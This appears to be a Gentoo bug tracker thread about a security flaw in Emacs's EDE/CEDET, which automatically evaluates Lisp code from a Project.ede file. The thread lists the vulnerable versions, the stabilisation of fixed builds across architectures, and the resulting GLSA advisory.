+++ This bug was initially created as a clone of Bug #398227 +++
"Hiroshi Oota has found a security flaw in EDE (part of CEDET), a development tool included in Emacs. EDE can store various information about a project, such as how to build the project, in a file named Project.ede in the project directory tree. When the minor mode `global-ede-mode' is enabled, visiting a file causes Emacs to look for Project.ede in the file's directory or one of its parent directories. If Project.ede is present, Emacs automatically reads and evaluates the first Lisp expression in it.
This design exposes EDE users to the danger of loading malicious code from one file (Project.ede), simply by visiting another file in the same directory tree."
This affects app-editors/emacs-23.2* and -23.3* (CEDET was added in Emacs 23.2).
Upstream commit is here:
CCing arch teams, please stabilise app-editors/emacs-23.3-r4.
According to Tim, is B
Hm, the summary isn't quite accurate. Please note that versions <23.2 don't support CEDET and are therefore not affected by the bug. Here's a complete list of vulnerable versions:
PVR <= 23.1-r3 unaffected
23.2 <= PVR <= 23.3-r3 vulnerable
23.4-r4 <= PVR unaffected
app-editors/emacs-vcs (live ebuilds omitted):
PVR <= 23.0.96 unaffected
23.1.90 <= PVR <= 23.2.94 vulnerable
23.3.90 <= PVR < 24 unaffected
24.0.50_pre20110116 <= PVR <= 24.0.92 vulnerable
24.0.92-r1 <= PVR unaffected
(In reply to comment #4)
> 23.4-r4 <= PVR unaffected
That should be 23.3-r4, of course. Sorry for the bugspam.
What a mess! So this is the target, right?:
(In reply to comment #7)
> What a mess! So this is the target, right?:
Right (see comment 1).
emacs-vcs has no stable versions.
x86 done. Thanks
Stable for HPPA.
Stable on all architectures. Vulnerable revision (emacs-23.2-r2) removed.
filed new request
Untrusted search path vulnerability in EDE in CEDET before 1.0.1, as used in
GNU Emacs before 23.4 and other products, allows local users to gain
privileges via a crafted Lisp expression in a Project.ede file in the
directory, or a parent directory, of an opened file.
This issue was resolved and addressed in
GLSA 201403-05 at http://security.gentoo.org/glsa/glsa-201403-05.xml
by GLSA coordinator Sergey Popov (pinkbyte).